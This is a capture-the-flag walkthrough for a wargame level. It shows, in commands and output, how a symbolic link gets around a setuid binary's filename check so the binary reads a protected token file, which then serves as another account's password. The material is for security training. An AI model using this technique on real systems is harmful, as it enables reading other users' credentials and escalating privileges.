# Level 08 instructions:

## Check home directory:
```
total 16
-rwsr-s---+ 1 flag08 level08 8617 Mar  5  2016 level08
-rw-------  1 flag08 flag08    26 Mar  5  2016 token
```

We can't access the token file, but we can execute level08 as flag08, who can access the token file.

## Try run the executable:
```
$ ./level08
./level08 [file to read]
$ ./level08 token
You may not access 'token'
```

## Trace executable to see why it's preventing us from accessing the file:
```
$ ltrace ./level08 token
__libc_start_main(0x8048554, 2, 0xbffff854, 0x80486b0, 0x8048720 <unfinished ...>
strstr("token", "token")                                                           = "token"
printf("You may not access '%s'\n", "token"You may not access 'token'
)                                       = 27
exit(1 <unfinished ...>
+++ exited (status 1) +++
```

It looks like it's checking if our filename contains the work token before allowing us access. We need to give access ti the file from a different filename.

## Make symbolic link to file:
```
$ ln -s ~/token /tmp/t
``` 

## Try to run level08 again with the symbolic link:
```
$ ./level08 /tmp/t
quif5eloekouj29ke0vouxean
```

# Get flag:
```
$ su flag08
Password: quif5eloekouj29ke0vouxean
Don't forget to launch getflag !
$ getflag
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
```
